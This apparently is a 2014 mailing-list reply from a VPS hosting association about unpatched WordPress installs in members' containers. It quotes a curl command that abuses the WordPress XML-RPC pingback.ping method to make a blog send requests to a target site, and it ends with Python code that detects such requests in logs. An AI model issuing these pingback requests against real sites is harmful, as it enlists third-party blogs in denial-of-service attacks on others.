On 03/16/2014 02:34 AM, Pavel Snajdr wrote:
But no matter what angle I think about it from, I just don't see how to
avoid it, apart from prevention/awareness...
Which simply doesn't work, though, because the freedom to have their own
server also belongs to those who just don't care about this and only need
their e-shop to run. There's little we can do with people like that, because
they approach it "install&forget" style, which just doesn't work for systems
exposed to the internet.
The question is how much to pester members about this. The standard answer to that tends to be something
like a bounty program, but I don't know yet how that could work for an association like
vpsfree.
Automating the search for outdated package versions across containers
still won't save the vulnerable WordPress installs sitting in the most
non-standard places; you can't search every container's FS like that.
I don't know, there's probably not much that can be done about it.
WordPress is evil: "Notorious botnet comes complete with blogging software"
curl -D - "http://awritersnotepad.wordpress.com/xmlrpc.php" -d
'<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://victim.com</string></value></param><param><value><string>awritersnotepad.wordpress.com/postchosen</string></value></param></params></methodCall>'
Funny reply header:
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Such source:
http://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-di…
Ondro
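
Added example, not part of the original message: a defender-side check for the pingback.ping request shown above, which parses logged XML-RPC request bodies and reports hosts that keep appearing as the pingback source (the URL WordPress fetches to verify the link). The function names, the threshold and the sample bodies are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET
from collections import Counter
from urllib.parse import urlsplit

def _body(source, target):
    """Build a constructed pingback.ping body in the shape shown in the message."""
    return ("<methodCall><methodName>pingback.ping</methodName><params>"
            f"<param><value><string>{source}</string></value></param>"
            f"<param><value><string>{target}</string></value></param>"
            "</params></methodCall>")

# Constructed sample request bodies (not captured traffic); hosts are placeholders.
SAMPLE_BODIES = [
    _body("http://target.example/", "http://blog.example/post-1"),
    _body("http://target.example/?a=1", "http://blog.example/post-2"),
    _body("http://target.example/?a=2", "http://blog.example/post-3"),
    _body("http://friend.example/article", "http://blog.example/post-1"),
    "<methodCall><methodName>system.listMethods</methodName><params/></methodCall>",
    "<!DOCTYPE x [<!ENTITY a 'b'>]><methodCall/>",
]

def parse_pingback(body):
    """Return (source_uri, target_uri) for a pingback.ping call, else None."""
    if "<!DOCTYPE" in body or "<!ENTITY" in body:
        return None  # XML-RPC needs no DTD; refuse entity tricks outright
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    if root.tag != "methodCall" or root.findtext("methodName") != "pingback.ping":
        return None
    # A <value> without a type element is a string in XML-RPC, hence the fallback.
    values = [v.findtext("string") or (v.text or "")
              for v in root.findall("params/param/value")]
    if len(values) != 2:
        return None
    return values[0].strip(), values[1].strip()

def suspicious_sources(bodies, threshold=3):
    """Hosts named as pingback source at least `threshold` times."""
    hits = Counter()
    for body in bodies:
        parsed = parse_pingback(body)
        host = urlsplit(parsed[0]).hostname if parsed else None
        if host:
            hits[host] += 1
    return {h: n for h, n in hits.items() if n >= threshold}
```

A legitimate pingback names a page that really links to the post, so one host recurring as the source across many requests with varying query strings is the pattern worth alerting on.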